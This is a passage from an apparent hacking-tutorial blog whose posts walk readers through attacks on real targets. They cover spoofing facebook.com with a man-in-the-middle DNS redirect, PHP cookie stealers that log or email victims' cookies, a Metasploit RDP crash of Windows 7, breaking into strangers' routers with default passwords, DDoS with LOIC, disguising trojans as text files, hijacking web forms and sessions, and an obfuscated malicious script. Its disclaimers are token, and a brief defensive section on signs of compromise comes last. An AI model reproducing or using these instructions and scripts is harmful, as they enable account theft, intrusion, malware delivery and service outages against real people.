When you finish, now the next step is preparing to redirect thefacebook.com page to the fake web server. Click "APRDNS" and click to add the new redirecting rule. When everything is finish, just click OK Then the next step is to activate the APR by clicking the Start/Stop APR button.
5. Now Hacking Facebook using MITM has been activated. This is how it looks like when victim open http://www.facebook.com
6. But if you ping the domain name, you can reveal that it’s fake, because the address is IP of the attacker.

Love this article?

Share it with your friends on Facebook

14/11/2014

How To Create Cookie Stealer Coding In PHP Get Via Email

Before you create Cookie stealer, it's important to know What are Cookies?

Here is the simple Cookie Stealer code

Cookie stored in File:

<?php $cookie = $HTTP_GET_VARS["cookie"]; $steal = fopen("cookiefile.txt", "a"); fwrite($steal, $cookie ."\\n"); fclose($steal); ?>$cookie = $HTTP_GET_VARS["cookie"];steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable. $steal = fopen("cookiefile.txt", "a"); This open the cookie file in append mode so that we can append the stolen cookie. fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file. fclose($steal);close the opened file.

Another version Sends cookies to the hacker mail

<?php $cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@ mailprovider.com", "Stolen Cookies", $cookie); ?> The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".

Third Version

<?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="log.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>"); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?> The above Cookie stealer will store the following information:
*. Ip address
*. port number
*. host(usually computer-name)
*. user agent
*. cookie

This site contains materials that can be potentially damaging or dangerous. If you are looking to comment a crime, you must leave this Page/site now! Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are for educational and research purposes only. Do not attempt to violate the law with anything contained here. If this is your intention, then LEAVE NOW!

Love this article?

Share it with your friends on Facebook

10/11/2014

Penetration Testing: Crash Windows 7 Using Metasploit and RDC Vulnerability

Crashing Windows 7

Now while the story so far has been smooth and cozy, it gets a bit tough from here on. For modern operating systems like Windows 7, there aren’t any magical exploits like the ones we had for unpatched Windows XP machines. We had been able to hack Windows XPand try some meterpreter features on the exploited XP machine. However, when it comes to Windows 7, there aren’t any direct exploits for gaining access to the machine. We can try some client side attacks, etc. Social engineering toolkit would be great for stuff like that. However, there is still one vulnerability that waits to be exploited. In Windows 7, there is a hole in the RDP port (3389) which can work over LAN as well as over the internet. Over the internet stuff can get a bit tougher, however on the LAN, this should be a piece of cake if you have successfully followed out pentest tutorials so far.

Requirements

Now you will require an attacker Kali machine, and a victim Windows machine, both running on Virtual machines. Windows 7 should be a fresh install, with no updates, as they can patch the vulnerability, making it unexploitable. Now when you have got all this setup, you can move on to further steps.

Information Gathering

Now you’ll have to find out the IP of out victim. This would have been complicated in a real life scenario, but in our case, you just go to Windows 7, open command prompt, and type ipconfig You should be looking for IPv4 address of Local Area Network.

In our case thats where the information Gathering Stops.

Starting Metasploit

Now execute the following commands to start metasploit framework.
service postgresql start
service metasploit start
msfconsole

Exploit

Now select the exploit that we are going to be using.
auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Now do a show options, it will tell you that it only requires two options, RHOST and RPORT. Rport is obviously 3389, the remote desktop port. The RHOST is the one you found out in the information gathering step. use the following code to set the RHOST set RHOST 192.168.—.—
Surprising as it may seem, we are done already. Just type exploit and The target machine will get a Blue Screen of Death and will reboot. You can do this as many times as you feel like, and in real life scenario, it can be really annoying, considering it can be done over the internet too.

Possible Problems

If you get an error of this sort, then most probably your Windows 7 machine has firewall enabled, and is blocking your packets. An antivirus could do the same thing. There might be some issues with the LAN connection too. A good diagnosis test would be to ping the machine. Go to a kali terminal and execute ping 192.168.—.—
After waiting for a while, press ctrl C which will stop the pinging.

If you get something like this (0 packets received), then there is absolutely no communication between the Kali and Windows machine (in effect, they are not on the same network, even though they are). That’s why the exploit doesn’t work.

Something like this means that the connection is just fine, and probably the Windows machine has become immune to the attack due to some patch. Look Here If its the former case, then you’ll have to find a way to get the connection working, and if its the latter, then try disabling firewall, antivirus, and maybe setting the network as home instead of public. Then go to advanced sharing settings, and choose all the options that you think will make your computer easier to hack. If possible, see if you can uninstall updates. The final thing to do is to get an early unpatched release of Windows 7. In some cases installing VMware tools might help.

Enable Remote Desktop

In many Windows releases, remote desktop is turned off by default. To enable it, follow these steps:
Go to System Control Panel\System and Security\System). Click on Remote settings. Select the “Allow Remote Connections to this computer” button. Click OK.

Love this article?

Share it with your friends on Facebook

06/11/2014

How to Hack Ethernet ADSL (Asymmetric Digital Subscriber Line) Router

Almost half of the Internet users across the globe use ADSL (Asymmetric Digital Subscriber Line) to connect to the Internet. However, most of them are unaware of the fact that it has a serious vulnerability in it which can easily be exploited by anyone with a basic knowledge of computer. In this post, I will show you how to hack an Ethernet ADSL router by exploiting the common vulnerability that lies in it.
Every router comes with a user name and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in the Default user name and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later. This makes it possible for the attackers to gain unauthorized access to the router and modify its settings using a common set of default usernames and passwords. Here is how you can do it. But before you proceed, you need the following tool in the process:
Angry IP Scanner

Hacking The ADSL Router

1. Go to whatismyipaddress.com. Once the page is loaded, you will find your IP address. Note it down.
2. Open Angry IP Scanner, here you will see an option called IP Range where you need to enter the range of IP address to scan for.
Suppose your IP Is:

117.192 .195.10 1, you can set the range something as 117.192 .194.0 to 117.192 .200.25 5 so that there exists at least 200-300 IP addresses in the range.

3. Go to Tools > Preferences and select the Ports tab. Under Port selection enter 80 (we need to scan for port 80). Now switch to the Display tab select the option Hosts with open ports only and click on OK.

4. Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image:

5. Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will pop up asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username and password pair will be admin-admin or admin-password. Now enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below:

If you do not succeed to gain access, select another IP from the list and repeat the step-5. At least 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

What Can A Hacker Do By Gaining Access To The Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or even hijack the DNS by pointing it at a rouge DNS server If this happens, the victim will have to reconfigure/reset the router settings in order to bring it back to normal.
Note: If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack. Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.

Love this article?

Share it with your friends on Facebook
Please Write Ushow to improve this site

28/10/2014

Shut down a Website With DDoS Attack

What is a Denial of Service Attack?

In computing, adenial-of-service (DoS) or distributed denial-of-service (DDoS) attackis an attempt to More Here

Types of denial of service attacks

There are several general categories of DoS attacks. Popularly, the attacks are divided into three classes:

Bandwidth Attacks

Protocol Attacks

Logic Attacks

What is Distributed Denial of Service Attack?

In DDOS attack, The attacker launches the attack using several machines. In this case, an attacker breaks into several machines, or coordinates with several zombies to launch an attack against a target or network at the same time. This makes it difficult to detect because attacks originate from several IP addresses. If a single IP address is attacking a company, it can block that address at its firewall. If it is 20000 this is extremely difficult.

Damages made By Denial of service attack

Over past years Denial of service attack has made huge amount of damage, Many of the have been victimed of this attack. This attack also hit Twitter and Facebook in past years, lot of people had trouble on logging on twitter and Facebook It was brought down by denial of service attack, They tired up there server so no one can get on log on it. Now i will show you how you can shut down a website with Denial of service attack. For this tutorial we will be using one of the most effective and one of the least known tools called Low Orbit Ion Cannon this program is one of the best for DDoS'ing, and I have successfully used it to DDoS websites. An internet connection as bad as mine (2,500 kb/s) was able to keep a site down for a day with this program running.
Remember that this tool will work best with high internet speeds, and try not to go for impossible targets like Google, Myspace,Yahoo. LOIC is used on a single computer, but with friends it's enough to give sites a great deal of downtime.
Pre-requisites: Download LOIC (Low Orbit Ion Cannon). Open up LOIC.

I am not giving a download link because then i will be accused for exiting hackers, try goggling

Step 1: Type the target URL in the URL box.
Step 2: Click lock on.
Step 3: Change the threads to 9001 for maximum efficiency.
Step 4: Click the big button
Feel free to tweak around with these settings and play around with the program to get the best performance. Then minimize and go do whatever you need to do, the program will take care of the rest!

27/10/2014

How to Sent a Trojan Horse Virus as Txt File

Today I am Going to Explain you that How to Send Trojans as a Text Files that will execute your desired codes.. As you all know that .exe is a Executable File and can run a Code .In this Guide I will teach you How to make a .txt executable that can run all of your codes binded or crypted behind it.

What is RAT or Remote Access Trojan?

Purpose of Trojan horses?

Trojan horses are designed to allow a hacker remote access to a target computer system. Once a Trojan horse has been installed on a target computer system it is possible for a hacker to access it remotely and perform various operations. The operations that a hacker can perform are limited by user privileges on the target computer system and the design of the Trojan horse.

Send Trojans as a Text Files

1. First of all You have to download the TEXT ICON PACK. You can download it from internet
2. Extract the Icon Pack to Obtain the Text Icons.
3. Open a new file, Right click - New - Shortcut Type the location of the item:
"X:/WINDOWS\system32\cmd.exe/cfile.txt" (where stands for "X"=Drive)

And name it Readme.txt
4. After creating the readme.txt file right click on it and choose Properties in the Start in fill %currentdir% in the Run choose Minimized

5. Then change the icon with one of the TXT icons from the pack by right clicking the readme.txt file then Properties-Change Icon.
6. In order to execute a file you need one just change your Server/Virus extension to .TXT and name it file.txt Now you have a .TXT Shortcut and .TXT Executable, when opening the txt shortcut it opens a command C:\WINDOWS\system32\cmd.exe /c test.txt" that executes the file you want.
7. Now the readme.txt executes a command window, in order to hide it Right click on the readme.txt and choose properties > Layout and reduced the size on the window to height=1 and width=1. Now change the window position to height=999 and width=999.
8. Now you are ready to sent a trojan as a txt file.

25/10/2014

Examples of Malicious JavaScript

If the hackers are using script to hack your site it will be obfuscated to try and hide what the script is doing. This type of hack can be inserted in individual html/php pages on a site or into one of the javascript files. The bottom line is, if you see blocks of obfuscated script in one of your files be suspicious, check to make sure you know exactly what the script is doing. In the vast majority of hacks the obfuscated script is going to write either an iframe or a script call into the pages of the site. The [src="http://some.malicious.site/malicious.php"] will be a URL that loads the malicious content into the page.
Now a few examples of code I have seen on hacked sites.

<scriptg&t;eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{})) </script>

Which de-obfuscates to ->

Always follow up with some basic security checks. Figuring out how the rats are getting into the barn is always tough. Most hosting services will help by checking access logs, looking at file ownership etc. so ask your hosting service for any information they can provide.

21/10/2014

Javascript Injections

Disclaimer: This site is for learning purposes only! Anyone looking to commit a crime, must leave this page now! We do not encourage or approve illegal acts nor criminal activity of any sort. Using these skills outside of these sites could result in arrest and imprisonment!
Introduction: In this tutorial we are going to teach you all the basics you need to know, to start hacking with Javascript Injections. Hackers use Javascript Injections to find and change the values of elements in a website. We can use Javascript for 3 things: Alerts Cookies forms and values. And we have two types of injections we will use:
Alert and Void. We use the Javascript Alert Injection to find out what an element is. And we use the Javascript Void Injection to change that element. The Javascript Void Injection prevents your page from refreshing. This ensures your changes are valid on your current page. While this can be done on any browser, most do not support this straight out of the box. The best browser to use while doing this is Internet Explorer.

The Javascript Alert injection

It is used to show you the value of an element within the site via a pop up. A Javascript Alert is written like this javascript:alert(); So in order to show the cookies on the site; we could write javascript:alert(document.cookie); in address bar and press enter. This would show us a list of the cookies in use. Which we can use as valuable knowledge to make our attack via a injection.

Javascript Void Injection

It is used for changing the values of elements within the site. The void injection makes sure your web browser does not refresh. This ensures your changes validity on the current page your editing. We could use this to change the value of a cookie we found using our Alert Injection. For that we would write the following:

javascript:void(document.cookie=”hackedcookie=value”);

You would just replace hackedcookie with the cookie you want to change. And value to that which the cookie needs to be set to. For example you could use true This could make the cookie valid and grant you access to the site.

Javascript Form Injections:

You can use the methods learned above to edit forms as well. Through editing forms you can have valuable information like passwords emailed to you. But forms require the code to be written a little bit different. For example let’s say the form code was the following:

you would need to write:

javascript:void(document.forms[0].to.value=”myemail@ tester.com”);

in order to change the email of the form. When Javascript Injecting a form you need to let it know which form you want to change. Incase there are multiple forms on the page. The form is referenced by forms[x]‘, x being which form. The first form on the page is 0. Just like when counting arrays you start with 0 not 1. And you can change to.value to any part of the form you want
Share This Article on Facebook

18/10/2014

HTTP Session Hijacking Tutorial

First of all, before going any further you have to understand what a cookie is. So what is a cookie?
So in this tutorial you will be using a tool called Wire Shark and a firefox add on called Add N Edit Cookies. When done this process, just minimize Cain And Abel. Wire shark is a tool used to sniff packets from the network clients. we will be using this to steal our cookies. Add N Edit Cookies add on is to inject the stolen cookie into firefox browser. Download and install wireshark, open it up and click on Capture from menu bar. select your interface and click Start. this will start to capture all the packets from your network

Now find the packets using ther filterer http.cookie Look for packets which has POST and GET in it. this is the HTTP information sent to server.

Now once you found the cookie, copy its value like this:

Paste it and save it in a notepad file. Now the final thing to do is, open firefox and start the Add N Edit Cookies Add on from tools menu. Now Insert the stolen cookie here, and you're done! you should be having access to the victim's account now!

16/10/2014

Continue

Computer passwords have changed

Online passwords Sometimes, after an online account is hacked the attacker changes the password to one or more of accounts. Try using the forgot password feature to reset the password. If your e-mail address has changed or this feature does not work, contact the company who is providing the service. they are the only ones who can reset your account.
Local computer password: If your password to log into your computer has changed, it may have been hacked. There is no reason why a password would change on its own.

E-mail spam being sent

When an e-mail account is taken over, the attacker almost always uses that account to spread spam and viruses. If your friends, family, or coworkers are receiving advertising e-mail from you, your e-mail is compromised. Log into your e-mail and change your e-mail account password.
Tip: E-mail addresses can also be spoofed without hacking the account. After changing the e-mail password, if your friends continue to get e-mails you have not sent, it is likely someone is spoofing your e-mail address.

Increased network activity

For any attacker to take control of a computer, they must remotely connect to it. When someone is remotely connected to your computer, your Internet connection will be slower. Also, many times after the computer is hacked it becomes a zombie to attack other computers. Installing a band width monitor program on the computer can help determine what programs are using what band width on your computer. Windows users can also use the netstat command to determine remote established network connections and open ports.

Subscribe to: Posts ( Atom )